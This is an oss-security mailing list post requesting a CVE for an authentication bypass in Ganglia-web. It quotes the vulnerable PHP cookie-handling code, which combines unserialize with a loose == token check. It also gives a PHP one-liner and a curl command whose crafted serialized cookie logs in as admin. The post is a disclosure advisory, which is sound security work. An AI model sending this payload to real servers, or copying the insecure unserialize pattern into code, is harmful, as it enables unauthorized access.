|
Message-ID: <55E9D62F.5030603@wallarm.com> Date: Fri, 04 Sep 2015 20:34:39 +0300 From: Ivan Novikov <in@...larm.com> To: oss-security@...ts.openwall.com Subject: CVE request: Ganglia-web auth bypass Reported by GitHub: https://github.com/ganglia/ganglia-web/issues/267 It's easy to bypass auth by using boolean serialization like this: $ php -r "echo urlencode(serialize(array('user'=>'admin', 'group'=>'admin', 'token'=>true)));" Vulnerable code listed below: https://github.com/ganglia/ganglia-web/blob/4e98ea69e0e18b388cdc73809ce54843a16ff87b/lib/GangliaAuth.php#L34-L46 if(isSet($_COOKIE['ganglia_auth'])) { $cookie = $_COOKIE['ganglia_auth']; // magic quotes will break unserialization if($this->getMagicQuotesGpc()) { $cookie = stripslashes($cookie); } $data = unserialize($cookie); if(array_keys($data) != array('user','group','token')) { return false; } if($this->getAuthToken($data['user']) == $data['token']) { // Found by d90.andrew // Exploit: curl -H 'Cookie: a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22group%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22token%22%3Bb%3A1%3B%7D' http://ganglia.local/ganglia/
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.